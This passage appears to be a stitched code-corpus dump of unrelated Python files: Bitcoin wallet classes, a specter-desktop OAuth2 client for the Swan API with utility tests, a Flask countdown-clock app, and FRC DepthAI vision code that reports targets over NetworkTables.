def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def is_deterministic(self):
return self.keystore.is_deterministic()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def create_new_address(self, for_change=False):
assert type(for_change) is bool
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change)
continue
if list(map(lambda a: self.address_is_old(a), addresses[-limit:] )) == limit*[False]:
break
else:
self.create_new_address(for_change)
def synchronize(self):
with self.lock:
if self.is_deterministic():
self.synchronize_sequence(False)
self.synchronize_sequence(True)
else:
if len(self.receiving_addresses) != len(self.keystore.keypairs):
pubkeys = self.keystore.keypairs.keys()
self.receiving_addresses = [self.pubkeys_to_address(i) for i in pubkeys]
self.save_addresses()
for addr in self.receiving_addresses:
self.add_address(addr)
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return bitcoin.pubkey_to_address(self.txin_type, pubkey)
``` |
{
"source": "jonathancross/specter-desktop",
"score": 2
} |
#### File: services/swan/client.py
```python
import base64
import datetime
import hashlib
import json
import logging
import secrets
from decimal import Decimal
from typing import List
from urllib.parse import urlparse
import pytz
import requests
from flask import current_app as app
from flask_babel import lazy_gettext as _
logger = logging.getLogger(__name__)
# TODO: Update with prod values
code_verifier = "<KEY>"
class SwanApiException(Exception):
pass
class SwanApiRefreshTokenException(SwanApiException):
pass
class SwanClient:
def __init__(
self, hostname, access_token: str, access_token_expires, refresh_token
):
self.hostname = hostname
self.access_token: str = str(
access_token
) # The ServiceSwan storage might have one in its storage
self.access_token_expires = (
access_token_expires # a timestamp when the access token will expire
)
self.refresh_token = refresh_token
self.api_url = app.config.get("SWAN_API_URL")
self.client_id = app.config.get("SWAN_CLIENT_ID")
self.client_secret = app.config.get("SWAN_CLIENT_SECRET")
def is_access_token_valid(self):
return (
self.access_token_expires > datetime.datetime.now(tz=pytz.utc).timestamp()
)
def calc_callback_url(self):
return f"http://{ self.hostname }{app.config['APP_URL_PREFIX']}{app.config['EXT_URL_PREFIX']}/swan/oauth2/callback"
def get_oauth2_start_url(self, callback_hostname):
"""
Set up the Swan API integration by requesting our initial access_token and
refresh_token.
"""
# Let's start the PKCE-flow
global code_verifier
self.hostname = callback_hostname
if code_verifier is None:
code_verifier = secrets.token_urlsafe(43)
# see specification: https://datatracker.ietf.org/doc/html/rfc7636#section-4.2
# and example impl: https://github.com/RomeoDespres/pkce/blob/master/pkce/__init__.py#L94-L96
hashed = hashlib.sha256(code_verifier.encode("ascii")).digest()
encoded = base64.urlsafe_b64encode(hashed)
code_challenge = encoded.decode("ascii")[:-1]
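        # Worked example (assumption: taken from RFC 7636 Appendix B): the verifier
        # "dBjftJeZ4CVP-mB92K27uhbUJU1p1r_wW1gFWFOEjXk" yields the challenge
        # "E9Melhoa2OwvFrEMTJguCHaoeK1t8URWbuGJSstw-cM" once the trailing '=' padding is stripped.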
flow_url = f"{self.api_url}/oidc/auth?"
query_params = [
f"client_id={self.client_id}",
f"redirect_uri={self.calc_callback_url()}",
"response_type=code",
"response_mode=query",
f"code_challenge={code_challenge}",
"code_challenge_method=S256",
"state=kjkmdskdmsmmsmdslmdlsm",
"scope=offline_access v1 write:vendor_wallet read:vendor_wallet write:automatic_withdrawal read:automatic_withdrawal",
"prompt=consent",
]
flow_url += "&".join(query_params)
return flow_url
def _get_access_token(
self, code: str = None, code_verifier: str = None, request_uri=None
) -> str:
"""
If code and code_verifier are specified, this is our initial request for an
access_token and, more importantly, the refresh_token.
If code is None, use the refresh_token to get a new short-lived access_token.
If we don't have the refresh_token, raise SwanApiRefreshTokenException.
"""
# Must explicitly set User-Agent; Swan firewall blocks all requests with "python".
auth_header = {"User-Agent": "Specter Desktop"}
if code:
# Requesting initial refresh_token and access_token
payload = {
"client_id": self.client_id,
"client_secret": self.client_secret,
"code_verifier": code_verifier,
"grant_type": "authorization_code",
"state": "kjkmdskdmsmmsmdslmdlsm",
"code": code,
"redirect_uri": request_uri,
}
else:
if self.is_access_token_valid():
return self.access_token
# Use the refresh_token to get a new access_token
if not self.refresh_token:
raise SwanApiRefreshTokenException(
"access_token is expired but we don't have a refresh_token"
)
payload = {
"grant_type": "refresh_token",
# "redirect_uri": # Necessary? Probably yes but more difficult to reconstruct it but the refresh-token is not yet used anyway
"refresh_token": self.refresh_token,
"scope": "offline_access v1 write:vendor_wallet read:vendor_wallet write:automatic_withdrawal read:automatic_withdrawal",
}
auth_hash = base64.b64encode(
f"{self.client_id}:{self.client_secret}".encode()
).decode()
auth_header["Authorization"] = f"Basic {auth_hash}"
response = requests.post(
f"{self.api_url}/oidc/token",
data=payload,
headers=auth_header,
)
resp = json.loads(response.text)
"""
{
"access_token": "***************",
"expires_in": 3600,
"refresh_token": "***************",
"scope": "offline_access v1 write:vendor_wallet read:vendor_wallet write:automatic_withdrawal read:automatic_withdrawal",
"token_type": "Bearer"
}
"""
if resp.get("access_token"):
self.access_token = resp.get("access_token")
self.access_token_expires = (
datetime.datetime.now(tz=pytz.utc)
+ datetime.timedelta(seconds=resp["expires_in"])
).timestamp()
self.refresh_token = resp.get("refresh_token")
return self.access_token
else:
logger.warning(response)
raise SwanApiException(response.text)
def handle_oauth2_auth_callback(self, request):
code = request.args.get("code")
rp = urlparse(request.url)
request_uri = f"{rp.scheme}://{rp.netloc}{rp.path}"
self._get_access_token(
code=code, code_verifier=code_verifier, request_uri=request_uri
)
def authenticated_request(
self, endpoint: str, method: str = "GET", json_payload: dict = {}
) -> dict:
logger.debug(f"{method} endpoint: {endpoint}")
access_token = self._get_access_token()
# Must explicitly set User-Agent; Swan firewall blocks all requests with "python".
auth_header = {
"User-Agent": "Specter Desktop",
"Authorization": f"Bearer {access_token}",
}
        response = None
        try:
if method == "GET":
response = requests.get(self.api_url + endpoint, headers=auth_header)
elif method in ["POST", "PATCH", "PUT", "DELETE"]:
response = requests.request(
method=method,
url=self.api_url + endpoint,
headers=auth_header,
json=json_payload,
)
if response.status_code != 200:
raise SwanApiException(f"{response.status_code}: {response.text}")
return response.json()
except Exception as e:
# TODO: tighten up expected Exceptions
logger.exception(e)
logger.error(
f"endpoint: {self.api_url}{endpoint} | method: {method} | payload: {json.dumps(json_payload, indent=4)}"
)
            if response is not None:
                logger.error(f"{response.status_code}: {response.text}")
raise e
def get_autowithdrawal_addresses(self, swan_wallet_id: str) -> dict:
"""
{
"entity": "wallet",
"item": {
"id": "c47e1e83-90a0-45da-ae25-6a0d324b9f29",
"isConfirmed": false,
"displayName": "Specter autowithdrawal to SeedSigner demo",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "seedsigner_demo"
},
"btcAddresses": []
}
}
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets/{swan_wallet_id}?full=true",
method="GET",
)
return resp
def update_autowithdrawal_addresses(
self,
swan_wallet_id: str,
specter_wallet_name: str,
specter_wallet_alias: str,
addresses: List[str],
) -> dict:
"""
* If SWAN_WALLET_ID is known, any existing unused addresses are cleared.
* If there is no known SWAN_WALLET_ID, we `POST` to create an initial Swan wallet and store the resulting SWAN_WALLET_ID.
* Sends the list of new addresses for SWAN_WALLET_ID.
"""
# normalize the strucure compatible with what swan will accept:
# like: [{"address": "bcrt1q8k8a73crvjs06jhdj7xee8mace3mhlxj4pdvna"}, {"address": "bcrt ...
addresses = [address["address"] for address in addresses]
if swan_wallet_id:
# We already have a Swan walletId. DELETE the existing unused addresses...
self.delete_autowithdrawal_addresses(swan_wallet_id)
# ...and then append the new ones.
endpoint = f"/apps/v20210824/wallets/{swan_wallet_id}/addresses"
method = "PATCH"
else:
# We don't yet have a Swan walletId. POST to create one.
endpoint = "/apps/v20210824/wallets"
method = "POST"
resp = self.authenticated_request(
endpoint=endpoint,
method=method,
json_payload={
"btcAddresses": [{"address": addr} for addr in addresses],
"displayName": str(
_('Specter Desktop "{}"').format(specter_wallet_name)
), # Can't pass a LazyString into json
"metadata": {
"specter_wallet_alias": specter_wallet_alias,
},
},
)
"""
Response should include wallet ("item") details:
{
"entity": "wallet",
"item": {
"id": "c47e1e83-90a0-45da-ae25-6a0d324b9f29",
"isConfirmed": false,
"displayName": "Specter autowithdrawal to SeedSigner demo",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "seedsigner_demo"
}
}
}
"""
if "item" in resp and "id" in resp["item"]:
if resp["item"]["id"] != swan_wallet_id:
swan_wallet_id = resp["item"]["id"]
return swan_wallet_id
else:
raise SwanApiException(
f"No 'id' returned for the new/updated wallet: {json.dumps(resp, indent=4)}"
)
def delete_autowithdrawal_addresses(self, swan_wallet_id: str):
"""
Deletes all unused autowithdrawal addresses from the specified SWAN_WALLET_ID
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets/{swan_wallet_id}/addresses",
method="DELETE",
)
return resp
def get_autowithdrawal_info(self) -> dict:
"""
See note in set_autowithdrawal. This returns all autowithdrawal objs from the Swan
side.
"""
resp = self.authenticated_request(
endpoint="/apps/v20210824/automatic-withdrawal",
method="GET",
)
return resp
def set_autowithdrawal(self, swan_wallet_id, btc_threshold: Decimal) -> dict:
"""
0 == Weekly; other float values = BTC threshold
The Swan api generates a new autowithdrawal id each time but there is no support to
update an existing autowithdrawal, other than activating or deactivating it.
New autowithdrawals are initialized as `isActive: false` and require the user to
complete a Swan-side email verification step.
We save the resulting autowithdrawal_id even though it isn't clear at the moment if
it's desirable to ever call the `deactivate/` or `activate/` endpoints.
"""
endpoint = "/apps/v20210824/automatic-withdrawal"
method = "POST"
resp = self.authenticated_request(
endpoint=endpoint,
method=method,
json_payload={
"walletId": swan_wallet_id,
"minBtcThreshold": btc_threshold,
},
)
"""
{
"entity": "automaticWithdrawal",
"item": {
"id": "******************",
"minBtcThreshold": "0.01",
"isActive": false,
"isCanceled": false,
"createdAt": "2022-01-07T02:14:56.070Z",
"walletId": "******************",
"walletAddressId": null
}
}
"""
if "item" in resp and "id" in resp["item"]:
return resp
else:
raise SwanApiException(
f"No 'id' returned for the new/updated autowithdrawal: {json.dumps(resp, indent=4)}"
)
def activate_autowithdrawal(self, autowithdrawal_id) -> dict:
"""
Activates the autowithdrawal specified in SwanService.AUTOWITHDRAWAL_ID.
If the automatic withdrawal was just created, this will generate a 400 error:
"Cannot activate an automatic withdrawal before withdrawal address is confirmed".
The user must first confirm the first withdrawal addr via Swan-side email flow.
After they confirm, the autowithdrawal should then return `isActive: true`.
NOT CURRENTLY USED; remove if we don't ever enable disable/activate flows.
"""
endpoint = f"/apps/v20210824/automatic-withdrawal/{autowithdrawal_id}/activate"
method = "POST"
resp = self.authenticated_request(
endpoint=endpoint,
method=method,
)
"""
{
"entity": "automaticWithdrawal",
"item": {
"id": "******************",
"minBtcThreshold": "0.01",
"isActive": true,
"isCanceled": false,
"createdAt": "2022-01-07T02:14:56.070Z",
"walletId": "******************",
"walletAddressId": null
}
}
"""
if "item" in resp and "id" in resp["item"]:
autowithdrawal_id = resp["item"]["id"]
return autowithdrawal_id
raise SwanApiException(
f"No 'id' returned for the new/updated autowithdrawal: {json.dumps(resp, indent=4)}"
)
def get_wallet_details(self, swan_wallet_id: str) -> dict:
"""
        {
            "entity": "wallet",
            "item": {
                "id": "********************",
                "walletAddressId": "********************",
                "btcAddress": "********************",
"isConfirmed": true,
"displayName": "Specter Desktop \"DCA Cold Storage\"",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "dca_cold_storage"
}
}
}
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets/{swan_wallet_id}",
method="GET",
)
return resp
def get_wallets(self) -> dict:
"""
Return all Swan wallet entries. Should only be one per Specter-Swan user combo (but can be more due
to testing/debugging, calling `/wallets` POST more than once, etc.)
"""
resp = self.authenticated_request(
endpoint=f"/apps/v20210824/wallets",
method="GET",
)
"""
{
"entity": "wallet",
"list": [
{
"id": "**********",
"walletAddressId": "**********",
"btcAddress": "bc1q**********",
"isConfirmed": false,
"displayName": "Specter Desktop \"SeedSigner demo\"",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "seedsigner_demo"
}
},
{
"id": "**********",
"walletAddressId": "**********",
"btcAddress": "bc1q**********",
"isConfirmed": false,
"displayName": "Specter Desktop \"DCA Corn\"",
"metadata": {
"oidc": {
"clientId": "specter-dev"
},
"specter_wallet_alias": "dca_corn_2"
}
},
...,
]
}
"""
return resp
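# Minimal usage sketch (assumption: illustrative only; SwanClient reads SWAN_API_URL,
# SWAN_CLIENT_ID and SWAN_CLIENT_SECRET from the Flask app config, so it must be
# constructed inside an application context):
# client = SwanClient("specter.local:25441", access_token=None, access_token_expires=0, refresh_token=None)
# print(client.get_oauth2_start_url("specter.local:25441"))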
```
#### File: specter/util/common.py
```python
import re
def str2bool(my_str):
"""returns a reasonable boolean from a string so that "False" will result in False"""
if my_str is None:
return False
elif isinstance(my_str, str) and my_str.lower() == "false":
return False
elif isinstance(my_str, str) and my_str.lower() == "off":
return False
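    # Any other non-empty string (including "0" or "no") falls through to bool()
    # below and is therefore treated as True.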
return bool(my_str)
def camelcase2snake_case(name):
"""If you pass DeviceManager it returns device_manager"""
pattern = re.compile(r"(?<!^)(?=[A-Z])")
name = pattern.sub("_", name).lower()
return name
def snake_case2camelcase(word):
return "".join(x.capitalize() or "_" for x in word.split("_"))
```
#### File: specter-desktop/tests/test_util_common.py
```python
from cryptoadvance.specter.util.common import (
camelcase2snake_case,
snake_case2camelcase,
str2bool,
)
def test_str2bool():
assert not str2bool(None)
assert str2bool("true")
assert str2bool("True")
assert str2bool("tRuE")
assert not str2bool("false")
assert not str2bool("False")
assert not str2bool("fAlsE")
assert str2bool("On")
assert str2bool("oN")
assert str2bool("ON")
assert not str2bool("Off")
assert not str2bool("oFF")
assert not str2bool("OFF")
def test_camelcase2snake_case():
assert camelcase2snake_case("Service") == "service"
assert camelcase2snake_case("DeviceType") == "device_type"
def test_snake_case2camelcase():
assert snake_case2camelcase("service") == "Service"
assert snake_case2camelcase("device_Type") == "DeviceType"
```
#### File: tretboot/tretboot/controller.py
```python
import logging
from flask import redirect, render_template, request, url_for, flash
from flask import current_app as app
from flask_login import login_required, current_user
from cryptoadvance.specter.services.controller import user_secret_decrypted_required
from cryptoadvance.specter.user import User
from cryptoadvance.specter.wallet import Wallet
from .service import TretbootService
logger = logging.getLogger(__name__)
tretboot_endpoint = TretbootService.blueprint
@tretboot_endpoint.route("/")
@login_required
@user_secret_decrypted_required
def index():
return render_template(
"tretboot/index.jinja",
)
@tretboot_endpoint.route("/settings", methods=["GET"])
@login_required
@user_secret_decrypted_required
def settings_get():
associated_wallet: Wallet = TretbootService.get_associated_wallet()
# Get the user's Wallet objs, sorted by Wallet.name
wallet_names = sorted(current_user.wallet_manager.wallets.keys())
wallets = [current_user.wallet_manager.wallets[name] for name in wallet_names]
return render_template(
"tretboot/settings.jinja",
associated_wallet=associated_wallet,
wallets=wallets,
cookies=request.cookies,
)
@tretboot_endpoint.route("/settings", methods=["POST"])
@login_required
@user_secret_decrypted_required
def settings_post():
show_menu = request.form["show_menu"]
user = app.specter.user_manager.get_user()
if show_menu == "yes":
user.add_service(TretbootService.id)
else:
user.remove_service(TretbootService.id)
used_wallet_alias = request.form.get("used_wallet")
    if used_wallet_alias is not None:
wallet = current_user.wallet_manager.get_by_alias(used_wallet_alias)
return redirect(url_for(f"{TretbootService.get_blueprint_name()}.settings_get"))
``` |
{
"source": "jonathancychow/countdown",
"score": 2
} |
#### File: countdown/countdown/app.py
```python
from flask import Flask, render_template, request, redirect, url_for
from countdown.flask_config import Config
import logging
from countdown.clock import ClockDriver, ClockMessage
from countdown.utils import get_clock_path
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG)
app = Flask(__name__)
app.config.from_object(Config)
def start_up():
driver = ClockDriver.start_clock_chromium()
message_url = ClockMessage(show_current = 1).set_url()
logging.info(f"Starting up with url: {message_url}")
driver.get(message_url)
driver.fullscreen_window()
return driver
driver = start_up()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/start_specific_time', methods=['POST'])
def start_specific_time():
start_time = request.form.get('starttime')
logging.info(f"Received Start Time: {start_time}")
message_url = ClockMessage(target_time = start_time).set_url()
logging.info(f"Start Counting Down")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
@app.route('/start_fixed_time', methods=['POST'])
def start_fixed_time():
start_time = request.form.get('fixtime')
logging.info(f"Received Start Time: {start_time}")
message_url = ClockMessage(fixed_time = start_time).set_url()
logging.info(f"Start Counting Down")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
@app.route('/send_message', methods=['POST'])
def send_message():
message = request.form['message']
logging.info("Received message : %s", message)
message_url = ClockMessage(message = message).set_url()
logging.info(f"Message sent to screen")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
@app.route('/show_current', methods=['POST'])
def show_current():
logging.info("Received request to display current time")
message_url = ClockMessage(show_current = 1).set_url()
logging.info(f"Message sent to screen")
driver.get(message_url)
driver.fullscreen_window()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run()
``` |
{
"source": "jonathandao0/depthai-frc",
"score": 3
} |
#### File: depthai-frc/common/frame_conversion.py
```python
from common.field_constants import FIELD_HEIGHT, ROBOT_SIZE
def pose3d_to_frame2d(object_pose, scaled_values):
pose3d = object_pose.copy()
pose3d[1] = FIELD_HEIGHT - pose3d[1]
pose = list(int(l * r) for l, r in zip(scaled_values, object_pose[:2]))
# pose.append(object_pose[3])
return pose
def object_pose_to_robot_pose(object_pose, camera_transform):
robot_pose = object_pose
return robot_pose
def robot_pose_to_frame2d_points(robot_pos, scaled_values):
left = robot_pos[0] - (ROBOT_SIZE[1] / 2)
top = FIELD_HEIGHT - robot_pos[2] - (ROBOT_SIZE[0] / 2)
right = robot_pos[0] + (ROBOT_SIZE[1] / 2)
bottom = FIELD_HEIGHT - robot_pos[2] + (ROBOT_SIZE[0] / 2)
left_top = pose3d_to_frame2d([left, top, 0, robot_pos[2]], scaled_values)
right_bottom = pose3d_to_frame2d([right, bottom, 0, robot_pos[2]], scaled_values)
return left_top, right_bottom
def frame2d_to_field2d(cv2_pos):
return cv2_pos[1], cv2_pos[0], cv2_pos[2]
def pose3d_to_field2d(pose3d):
return pose3d[2], pose3d[0]
```
#### File: depthai-frc/common/mjpeg_stream.py
```python
import cv2
import logging
import threading
from PIL import Image
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from time import sleep
import simplejpeg
log = logging.getLogger(__name__)
SERVER_IP = 'localhost'
COLORSPACE = 'BGR'
QUALITY = 20
# HTTPServer MJPEG
class VideoStreamHandler(BaseHTTPRequestHandler):
def do_GET(self):
global QUALITY
global COLORSPACE
self.send_response(200)
self.send_header('Content-type', 'multipart/x-mixed-replace; boundary=--jpgboundary')
self.end_headers()
while True:
try:
if hasattr(self.server, 'quality'):
QUALITY = self.server.quality
encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), QUALITY]
if hasattr(self.server, 'colorspace'):
COLORSPACE = self.server.colorspace
if hasattr(self.server, 'frame_to_send'):
# image = Image.fromarray(cv2.cvtColor(self.server.frametosend, cv2.COLOR_BGR2RGB))
# stream_file = BytesIO()
# image.save(stream_file, 'JPEG')
self.wfile.write("--jpgboundary".encode())
frame = cv2.resize(self.server.frame_to_send, (320, 320))
# frame = self.server.frame_to_send
if COLORSPACE == 'BW':
                        img_str = cv2.imencode('.jpg', frame, encode_param)[1].tobytes()
else:
img_str = simplejpeg.encode_jpeg(frame, quality=QUALITY, colorspace=COLORSPACE, fastdct=True)
self.send_header('Content-type', 'image/jpeg')
# self.send_header('Content-length', str(stream_file.getbuffer().nbytes))
self.send_header('Content-length', len(img_str))
self.end_headers()
# image.save(self.wfile, 'JPEG')
self.wfile.write(img_str)
self.wfile.write(b"\r\n--jpgboundary\r\n")
sleep(0.03)
except Exception as e:
log.error("MJPEG Exception: {}".format(e))
self.flush_headers()
self.finish()
pass
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
pass
class MjpegStream:
def __init__(self, IP_ADDRESS=SERVER_IP, HTTP_PORT=8090, QUALITY=20, colorspace='BGR'):
# start MJPEG HTTP Server
log.info("MJPEG Stream starting at {}:{}".format(IP_ADDRESS, HTTP_PORT))
self.server_HTTP = ThreadedHTTPServer((IP_ADDRESS, HTTP_PORT), VideoStreamHandler)
cfg = {
'quality': QUALITY,
'colorspace': colorspace
}
self.set_config(cfg)
th = threading.Thread(target=self.server_HTTP.serve_forever)
th.daemon = True
th.start()
def set_config(self, config):
if 'quality' in config:
self.server_HTTP.quality = config['quality']
if 'colorspace' in config:
self.server_HTTP.colorspace = config['colorspace']
def send_frame(self, frame):
self.server_HTTP.frame_to_send = frame
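# Minimal usage sketch (assumption: illustrative only; frames are BGR numpy arrays,
# e.g. read from a cv2.VideoCapture):
# stream = MjpegStream(IP_ADDRESS="0.0.0.0", HTTP_PORT=8090, QUALITY=30)
# while True:
#     ok, frame = capture.read()
#     if ok:
#         stream.send_frame(frame)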
```
#### File: depthai-frc/goal-depth-intake-detection-host/main.py
```python
import argparse
import operator
import threading
import numpy as np
from time import sleep
import cv2
import depthai as dai
import socket
from common.config import NN_IMG_SIZE
from common.cscore_stream import CsCoreStream
from pipelines import goal_edge_depth_detection, object_edge_detection
import logging
from common import target_finder
from common.mjpeg_stream import MjpegStream
from networktables.util import NetworkTables
from common.utils import FPSHandler
parser = argparse.ArgumentParser()
parser.add_argument('-d', dest='debug', action="store_true", default=False, help='Start in Debug Mode')
args = parser.parse_args()
log = logging.getLogger(__name__)
class Main:
def __init__(self):
log.info("Connected Devices:")
for device in dai.Device.getAllAvailableDevices():
log.info(f"{device.getMxId()} {device.state}")
self.init_networktables()
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip_address = s.getsockname()[0]
except:
ip_address = 'localhost'
port1 = 5801
port2 = 5802
self.device_list = {"OAK-D_Goal": {
'name': "OAK-D_Goal",
'id': "14442C1091398FD000",
# 'id': "14442C10218CCCD200",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port1),
'nt_tab': NetworkTables.getTable("OAK-D_Goal")
}, "OAK-1_Intake": {
'name': "OAK-1_Intake",
'id': "14442C1011043ED700",
# 'id': "14442C10C14F47D700",
'fps_handler': FPSHandler(),
'stream_address': "{}:{}".format(ip_address, port2),
'nt_tab': NetworkTables.getTable("OAK-1_Intake")
}}
self.goal_pipeline, self.goal_labels = goal_edge_depth_detection.create_pipeline("infiniteRecharge2021")
self.intake_pipeline, self.intake_labels = object_edge_detection.create_pipeline("infiniteRecharge2021")
self.oak_d_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
self.oak_1_stream = MjpegStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
# self.oak_d_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port1, colorspace='BW', QUALITY=10)
# self.oak_1_stream = CsCoreStream(IP_ADDRESS=ip_address, HTTP_PORT=port2, colorspace='BW', QUALITY=10)
def parse_goal_frame(self, frame, edgeFrame, bboxes):
kernel = np.ones((3, 3), np.uint8)
edgeFrame = cv2.morphologyEx(edgeFrame, cv2.MORPH_CLOSE, kernel, iterations=1)
# edgeFrame = cv2.threshold(edgeFrame, 20, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['red_upper_power_port', 'blue_upper_power_port']
nt_tab = self.device_list['OAK-D_Goal']['nt_tab']
if len(bboxes) == 0:
nt_tab.putString("target_label", "None")
nt_tab.putNumber("tv", 0)
else:
for bbox in bboxes:
target_label = self.goal_labels[bbox['label']]
if target_label not in valid_labels:
continue
edgeFrame, target_x, target_y = target_finder.find_largest_hexagon_contour(edgeFrame, bbox)
if target_x == -999 or target_y == -999:
log.error("Error: Could not find target contour")
continue
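                # Convert the pixel offset from the frame centre into a horizontal angle.
                # The constants are assumed to be the camera's horizontal FOV in degrees
                # (~68.79) over its full 1920-px sensor width.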
angle_offset = (target_x - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
if abs(angle_offset) > 30:
log.info("Invalid angle offset. Setting it to 0")
nt_tab.putNumber("tv", 0)
angle_offset = 0
else:
log.info("Found target '{}'\tX Angle Offset: {}".format(target_label, angle_offset))
nt_tab.putNumber("tv", 1)
nt_tab.putString("target_label", target_label)
nt_tab.putNumber("tx", angle_offset)
nt_tab.putNumber("tz", bbox['depth_z'])
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']),
(255, 255, 255), 2)
cv2.circle(edgeFrame, (int(round(target_x, 0)), int(round(target_y, 0))), radius=5, color=(128, 128, 128),
thickness=-1)
bbox['target_x'] = target_x
bbox['target_y'] = target_y
bbox['angle_offset'] = angle_offset
fps = self.device_list['OAK-D_Goal']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_d_stream.send_frame(edgeFrame)
return frame, edgeFrame, bboxes
def parse_intake_frame(self, frame, edgeFrame, bboxes):
edgeFrame = cv2.threshold(edgeFrame, 60, 255, cv2.THRESH_TOZERO)[1]
valid_labels = ['power_cell']
nt_tab = self.device_list['OAK-1_Intake']['nt_tab']
filtered_bboxes = []
for bbox in bboxes:
if self.intake_labels[bbox['label']] in valid_labels:
filtered_bboxes.append(bbox)
filtered_bboxes.sort(key=operator.itemgetter('size'), reverse=True)
if len(filtered_bboxes) == 0:
nt_tab.putNumber("tv", 0)
nt_tab.putNumberArray("ta", [0])
else:
nt_tab.putNumber("tv", 1)
target_angles = []
for bbox in filtered_bboxes:
angle_offset = (bbox['x_mid'] - (NN_IMG_SIZE / 2.0)) * 68.7938003540039 / 1920
cv2.rectangle(edgeFrame, (bbox['x_min'], bbox['y_min']), (bbox['x_max'], bbox['y_max']), (255, 255, 255), 2)
target_angles.append(angle_offset)
bbox['angle_offset'] = angle_offset
nt_tab.putNumberArray("ta", target_angles)
fps = self.device_list['OAK-1_Intake']['fps_handler']
fps.next_iter()
cv2.putText(edgeFrame, "{:.2f}".format(fps.fps()), (0, 20), cv2.FONT_HERSHEY_TRIPLEX, 0.5, (255, 255, 255))
self.oak_1_stream.send_frame(edgeFrame)
return frame, edgeFrame, filtered_bboxes
def init_networktables(self):
NetworkTables.startClientTeam(4201)
if not NetworkTables.isConnected():
log.info("Could not connect to team client. Trying other addresses...")
NetworkTables.startClient([
'10.42.1.2',
'127.0.0.1',
'10.0.0.2',
'192.168.100.108'
])
if NetworkTables.isConnected():
log.info("NT Connected to {}".format(NetworkTables.getRemoteAddress()))
return True
else:
log.error("Could not connect to NetworkTables. Restarting server...")
return False
def run(self):
log.info("Setup complete, parsing frames...")
threadlist = []
try:
found_1, device_info_1 = dai.Device.getDeviceByMxId(self.device_list['OAK-D_Goal']['id'])
self.device_list['OAK-D_Goal']['nt_tab'].putBoolean("OAK-D_Goal Status", found_1)
if found_1:
th1 = threading.Thread(target=self.run_goal_detection, args=(device_info_1,))
th1.start()
threadlist.append(th1)
found_2, device_info_2 = dai.Device.getDeviceByMxId(self.device_list['OAK-1_Intake']['id'])
self.device_list['OAK-1_Intake']['nt_tab'].putBoolean("OAK-1_Intake Status", found_2)
if found_2:
th2 = threading.Thread(target=self.run_intake_detection, args=(device_info_2,))
th2.start()
threadlist.append(th2)
while True:
for t in threadlist:
if not t.is_alive():
break
sleep(10)
finally:
log.info("Exiting Program...")
def run_goal_detection(self, device_info):
